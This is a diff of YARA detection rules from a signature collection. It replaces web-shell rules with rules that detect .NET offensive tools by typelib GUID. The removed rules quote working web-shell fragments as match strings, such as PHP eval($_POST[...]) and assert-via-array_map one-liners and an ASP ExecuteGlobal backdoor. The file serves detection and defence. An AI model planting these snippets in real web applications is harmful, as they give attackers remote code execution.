+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3340a095-d926-5c85-b7ed-03151712538d"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/mdsecactivebreach/CloneVault"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4356-L4369"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "55ad9309b006884f660c41e53150fc2e"
-		logic_hash = "b3c7a9bdaa7e5bf76df9ffba94157777c32199edeaa1c8745e9400d138abc267"
-		score = 70
+		logic_hash = "830802635e6fc9e364ec574bc9f04b062100c46bfbed7029f437c0392ce983bc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
-		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
-		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
-		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
-		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
-		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
+		$typelibguid0lo = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Donut : FILE
 {
 	meta:
-		description = "Web shells - generated from file pHp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3384-L3401"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "564dfd0a-af9b-505f-a6f0-de2a5c5c63f3"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/TheWover/donut"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4371-L4387"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b0e842bdf83396c3ef8c71ff94e64167"
-		logic_hash = "a943f3b0d1d56194e250c7cf3e05b2bfec7b29f91ef56085d645efa3fe8995c9"
-		score = 70
+		logic_hash = "aae1ca872f60ddc6919938e55d98d27bf88fb382e8d47c06cfc3d3e795ce9f2a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
-		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
-		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
-		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
-		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
+		$typelibguid0lo = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii wide
+		$typelibguid1lo = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii wide
+		$typelibguid2lo = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii wide
+		$typelibguid3lo = "361c69f5-7885-4931-949a-b91eeab170e3" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Pppp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphandler : FILE
 {
 	meta:
-		description = "Web shells - generated from file pppp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3402-L3417"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b71198a9-4d00-5d75-bc36-7c40655c84a3"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/jfmaes/SharpHandler"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4389-L4403"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cf01cb6e09ee594545693c5d327bdd50"
-		logic_hash = "bd09fc2ec88bea83b16e63afafa3d5f74f119a81046a663322f5b396b48da135"
-		score = 70
+		logic_hash = "3aee0d00306603786fdcf828dc2b1a2faed6c8e651b56eb1985c1b640966da20"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Mail: chinese@hackermail.com" fullword
-		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
-		$s6 = "Site: http://blog.weili.me" fullword
+		$typelibguid0lo = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii wide
+		$typelibguid1lo = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Code
+rule SIGNATURE_BASE_HKTL_NET_GUID_Driver_Template : FILE
 {
 	meta:
-		description = "Web shells - generated from file code.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3418-L3435"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "539f88c5-e779-55e0-98df-299a9068de9b"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/FuzzySecurity/Driver-Template"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4405-L4418"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a444014c134ff24c0be5a05c02b81a79"
-		logic_hash = "5ae053a9afc1f720c56304c434cd89861e1df4060b7d813921e7f85978227020"
-		score = 70
+		logic_hash = "6d8e59b58b7d9d15b9bbafd70a2e303e2b275f9a81fc66ea60b1ffd4a4601207"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
-		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
-		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
-		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
-		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
+		$typelibguid0lo = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Jspyyy
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nashavm : FILE
 {
 	meta:
-		description = "Web shells - generated from file jspyyy.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3436-L3449"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3abbf636-01f4-547a-98c0-d7bfec07e31a"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/Mrakovic-ORG/NashaVM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4420-L4433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
-		logic_hash = "0afe45556aa7b562672cc4b609cf001aaa617b03028322abac6524f666b069e1"
-		score = 70
+		logic_hash = "b472d072c39e35c476fa9f0fbca8bf0125ca9359f2e6aac7da58f66ea1b11ed6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
+		$typelibguid0lo = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Xxxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsqlpwn : FILE
 {
 	meta:
-		description = "Web shells - generated from file xxxx.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3450-L3463"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b533d61a-8693-5c3c-8b31-2117262cad4e"
+		date = "2022-11-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/lefayjey/SharpSQLPwn.git"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4435-L4448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5bcba70b2137375225d8eedcde2c0ebb"
-		logic_hash = "e14cc1eaf357389ca58193c77ce2f54774aebb42be9df15f12415df356c7ed42"
-		score = 70
+		logic_hash = "e9210d12c7a8d5973e33aa7bb559ce1c744fd7a810979bec37f95d731c3b50ac"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php eval($_POST[1]);?>  " fullword
+		$typelibguid0lo = "c442ea6a-9aa1-4d9c-9c9d-7560a327089c" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Group3R : FILE
 {
 	meta:
-		description = "Web shells - generated from file JJjsp3.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3464-L3477"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0571d71e-50ca-5c1b-b750-34acc2d06687"
+		date = "2022-11-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/Group3r/Group3r.git"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4450-L4464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "949ffee1e07a1269df7c69b9722d293e"
-		logic_hash = "44889540effa2f71889e7f6d0c5d12486e256d83b9230c4902d56f6a59b7939b"
-		score = 70
+		logic_hash = "898569553257991c3776835ec10d5fae697e55bca9c14667ff72c079a095bbf1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
+		$typelibguid0lo = "868a6c76-c903-4a94-96fd-a2c6ba75691c" ascii wide
+		$typelibguid1lo = "caa7ab97-f83b-432c-8f9c-c5f1530f59f7" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_PHP1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenstomp : FILE
 {
 	meta:
-		description = "Web shells - generated from file PHP1.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3478-L3493"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e4266969-ab03-50dc-b5b1-f4bb1c9846f4"
+		date = "2022-11-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/MartinIngesen/TokenStomp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4466-L4479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
-		logic_hash = "1c5eb355455c7fbd2b74d91f78e1d77f460dfeb4fe0ee65f18aa1453337b67a0"
-		score = 70
+		logic_hash = "931950e70ecfd3e87e535b32bd8af43d70b36670d5e0142e2fb95ed92c85fbd9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
-		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
-		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+		$typelibguid0lo = "8aac271f-9b0b-4dc3-8aa6-812bb7a57e7b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Krbrelay : FILE
 {
 	meta:
-		description = "Web shells - generated from file JJJsp2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3494-L3510"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3f59986c-8bd8-5e70-b3eb-038247d1ccd7"
+		date = "2022-11-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/cube0x0/KrbRelay"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4481-L4495"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5a9fec45236768069c99f0bfd566d754"
-		logic_hash = "47dca67c7a01035996d032cb3871da5532aea81ab6570c93c4a6b148fd95e9f9"
-		score = 70
+		logic_hash = "b5f8a3f6ba7ba5fa59cdc52337f92256257ec0994ae16fce074d70ad5afa3bc6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
-		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
-		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
-		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
+		$typelibguid0lo = "ed839154-90d8-49db-8cdd-972d1a6b2cfd" ascii wide
+		$typelibguid1lo = "3b47eebc-0d33-4e0b-bab5-782d2d3680af" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Radhat
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sqlrecon : FILE
 {
 	meta:
-		description = "Web shells - generated from file radhat.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3511-L3524"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f9ea5283-0a5c-5bde-966c-80869ee25888"
+		date = "2023-01-20"
+		modified = "2025-08-15"
+		reference = "https://github.com/skahwah/SQLRecon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4497-L4510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "72cb5ef226834ed791144abaa0acdfd4"
-		logic_hash = "28d4d380b25da05a3be439bad72725fa49c947535dfeb5c24994a849c0592b81"
-		score = 70
+		logic_hash = "d1cf5a34a09ed323aeee69080e2f046b613f18294328529a4cca1c49c14da575"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "sod=Array(\"D\",\"7\",\"S"
+		$typelibguid0lo = "612c7c82-d501-417a-b8db-73204fdfda06" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Asp1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Certify : FILE
 {
 	meta:
-		description = "Web shells - generated from file asp1.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3525-L3539"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "69f120fe-bd4d-59ba-b1b9-528ab300e450"
+		date = "2023-03-06"
+		modified = "2025-08-11"
+		reference = "https://github.com/GhostPack/Certify"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4512-L4527"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b63e708cd58ae1ec85cf784060b69cad"
-		logic_hash = "6c76c5388825e29d333096d4cfa3782b7776f31b206a0ed5a8809428d698778b"
-		score = 70
+		hash = "da585a8d4985082873cb86204d546d3f53668e034c61e42d247b11e92b5e8fc3"
+		logic_hash = "cc31eb8f11f8c48d8c6d34c343c273ac085fdac214ffc7521d26b4a19edd0c4c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
-		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+		$typelibguid0_v1 = "64524ca5-e4d0-41b3-acc3-3bdbefd40c97" ascii wide
+		$typelibguid0_v2 = "15cfadd8-5f6c-424b-81dc-c028312d025f" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php6
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aladdin : FILE
 {
 	meta:
-		description = "Web shells - generated from file php6.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3540-L3555"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3f0a954c-f3b3-5e5d-a71d-11f60b026a48"
+		date = "2023-03-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/nettitude/Aladdin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4529-L4544"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ea75280224a735f1e445d244acdfeb7b"
-		logic_hash = "495dc6c6769b8605ea946c012ad0ebb54685e7e91afd383027640753d90c6b3f"
-		score = 70
+		logic_hash = "e038ea5b2caed819df725e454ad31ba00b2b1b356875eecd73f2b8a0908c2e33"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "array_map(\"asx73ert\",(ar"
-		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
-		$s4 = "shell.php?qid=zxexp  " fullword
+		$typelibguid0lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
+		$typelibguid1lo = "c47e4d64-cc7f-490e-8f09-055e009f33ba" ascii wide
+		$typelibguid2lo = "32a91b0f-30cd-4c75-be79-ccbd6345de99" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpldaprelayscan : FILE
 {
 	meta:
-		description = "Web shells - generated from file xxx.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3556-L3569"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "554a5487-ac53-512f-8f6f-ad8186144715"
+		date = "2023-03-15"
+		modified = "2025-08-15"
+		reference = "https://github.com/klezVirus/SharpLdapRelayScan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4546-L4559"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0e71428fe68b39b70adb6aeedf260ca0"
-		logic_hash = "837ed266af8a65ac683be39c32509df34bc8041b336a71c12700ca73bf210b4d"
-		score = 70
+		logic_hash = "d0b9573ee9893225c5621d02f99f67296193d93a42390125611fe0560bc95fa9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+		$typelibguid0lo = "a93ee706-a71c-4cc1-bf37-f26c27825b68" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Getpostphp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ldapsigncheck : FILE
 {
 	meta:
-		description = "Web shells - generated from file GetPostpHp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3570-L3583"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a8b902f0-61a5-509e-8307-79bf557e5f61"
+		date = "2023-03-15"
+		modified = "2025-08-15"
+		reference = "https://github.com/cube0x0/LdapSignCheck"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4561-L4574"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "20ede5b8182d952728d594e6f2bb5c76"
-		logic_hash = "e75f66200593c3fdaadf1881235847f6c3f3caadcb7ffe13e8b01bce5f922702"
-		score = 70
+		logic_hash = "ffeee319b4161611e3e792aaec2e74c8e368d69c7f5ba9738105f536590099e8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+		$typelibguid0lo = "21f398a9-bc35-4bd2-b906-866f21409744" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php5
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsccm : FILE
 {
 	meta:
-		description = "Web shells - generated from file php5.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3584-L3597"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "276269b1-e3b3-5774-a86a-1c3a8bca8209"
